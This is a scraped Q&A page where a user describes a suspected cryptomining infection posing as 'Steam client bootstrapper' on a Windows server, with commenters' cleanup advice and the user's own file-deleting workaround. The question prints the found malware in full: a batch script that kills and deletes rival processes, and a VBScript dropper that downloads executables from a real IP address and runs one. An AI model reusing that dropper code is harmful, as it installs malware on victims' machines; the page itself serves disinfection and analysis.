How to permanently kill steam client bootstrapper

windows virus-removal avg-antivirus
6,788

I want to share a workaround that I found for my problem.

As a programmer, I've created a program that constantly monitors the folder c:\ProgramData\ for any new files. And if some of the files that belong to "steam client bootstrappper" appears inside of that folder, my program deletes those files before they will be executed. If anybody needs to modify this utility you can find it at GitHub.

After I've executed this primitive antivirus (actually antiPUP) my system stopped from being slow. One more detail that is required for this program to work with stability is the requirement to crate folder c:\ProgramData\copyForVirus\. I've made the program to create a copy of those virus files in order to analyze them later in some more VM Ware environment for what are internals of those files.

Share:
6,788
Yuriy Zaletskyy
Author by

Yuriy Zaletskyy

Updated on September 18, 2022

Comments

  • Yuriy Zaletskyy
    Yuriy Zaletskyy almost 2 years

    I have the following situation in my task manager:

    Task Manager - Processes

    I don't know what kind of app it is, but definitely not Steam client bootstrapper because I didn't install it and also can't uninstall it.

    If I try to figure out what kind of app it is via this step:

    Task Manager - Go to details

    I see something like this:

    Task Manager - Details

    In MS Config utility I didn't find anything that looks like secury.exe.

    When I open the file location, I see three files:

    m.bat, b.exe, 4.vbs.

    Below goes the content of m.bat:

    taskkill /f /t /im secury.exe
c:\ProgramData\secury.exe
taskkill /f /t /im kingsoft.exe
taskkill /f /t /im expl0rer.exe
taskkill /f /t /im ieplare.exev
taskkill /f /t /im nssm.exe
taskkill /f /t /im MSASCui.exe
taskkill /f /t /im SystemSettlngs.exe
taskkill /f /t /im SystemSetting.exe
taskkill /f /t /im Process.exe
taskkill /f /t /im winlnlt.exe
taskkill /f /t /im WindowsUpgrade.exe
taskkill /f /t /im msdc.exe
taskkill /f /t /im Fiddlere.exe
taskkill /f /t /im shovst.exe
taskkill /f /t /im lqrtqe.exe
taskkill /f /t /im apkls.exe
taskkill /f /t /im winlog.exe
taskkill /f /t /im svchosts.exe
taskkill /f /t /im win1ogins.exe
taskkill /f /t /im shovsts.exe
taskkill /f /t /im fcty.exe
taskkill /f /t /im soiuos.exe
taskkill /f /t /im TrustedInstaller.exe
del C:\Windows\System32\soiuos.exe
del C:\Windows\Setup\TrustedInstaller.exe
del C:\ProgramData\kingsoft.exe
del C:\ProgramData\expl0rer.exe
del C:\ProgramData\ieplare.exe
del C:\ProgramData\nssm.exe
del C:\ProgramData\MSASCui.exe
del C:\ProgramData\SystemSettlngs.exe
del C:\ProgramData\SystemSetting.exe
del C:\ProgramData\Process.exe
del C:\ProgramData\winlnlt.exe
del C:\ProgramData\WindowsUpgrade.exe
del C:\ProgramData\msdc.exe
del C:\ProgramData\Fiddlere.exe
del C:\ProgramData\shovst.exe
del C:\ProgramData\lqrtqe.exe
del C:\ProgramData\apkls.exe
del C:\ProgramData\winlog.exe
del C:\ProgramData\svchosts.exe
del C:\ProgramData\win1ogins.exe
del C:\ProgramData\shovsts.exe
del C:\ProgramData\fcty.exe
del C:\ProgramData\pool.exe
del C:\ProgramData\pool2.exe
del C:\ProgramData\pool3.exe

    Next goes 4.vbs:

    Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/2.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\ProgramData\s2.exe",2
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/pool.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\ProgramData\pool2.exe",2
CreateObject("WScript.Shell").Run "C:\ProgramData\pool3.exe"
CreateObject("WScript.Shell").Run "del C:\ProgramData\pool3.exe"

    What can I do in order to stop secury.exe from abusing computing powers of my server?

    P.S. I've executed Avast full check of my computer, but it didn't find anything wrong.

    • Admin
      Admin over 6 years
      That... looks awfully suspicious (the content of those batch files and the VBS). Any chance of you going into safe mode (and hopefully that thing is not running) and then you can try to delete them? If safe mode is not an option - boot from an external drive (or Linux LiveUSB/LiveCD) and with the HDD accessible - delete those files?
    • Admin
      Admin over 6 years
      At this point you should assume that your computer has been completely compromised. You could run a number of virus checkers and pray that they've worked - but I'd recommend backing up everything of importance and then formatting and reinstalling Windows.
    • Admin
      Admin over 6 years
      I deleted those files many times, but it didn't work

Recents

Why Is PNG file with Drop Shadow in Flutter Web App Grainy?
How to troubleshoot crashes detected by Google Play Store for Flutter app
Cupertino DateTime picker interfering with scroll behaviour
Why does awk -F work for most letters, but not for the letter "t"?
Flutter change focus color and icon color but not works
How to print and connect to printer using flutter desktop via usb?
Critical issues have been reported with the following SDK versions: com.google.android.gms:play-services-safetynet:17.0.0
Flutter Dart - get localized country name from country code
navigatorState is null when using pushNamed Navigation onGenerateRoutes of GetMaterialPage
Android Sdk manager not found- Flutter doctor error
Flutter Laravel Push Notification without using any third party like(firebase,onesignal..etc)
How to change the color of ElevatedButton when entering text in TextField

Related

Windows: How to disable all third-party security products
How do I temporarily turn off AVG Antivirus?
How can I perform a virus scan of my Windows install from Linux?
How to print and connect to printer using flutter desktop via usb?
Why does Windows magically "couple" some files like this?
Flutter_CLI: Because every version of flutterfire_cli depends on xml >=5.3.0 which requires SDK version >=2.14.0 <3.0.0, flutterfire_cli is forbidden
Can windows viruses affect my encrypted linux partition on the same disk?
How can I reduce the noise my CPU makes, like fast mouse movement does?
Flutter - Why is there a windows folder in my app?
No implementation found for method getAll on channel dev.fluttercommunity.plus/package_info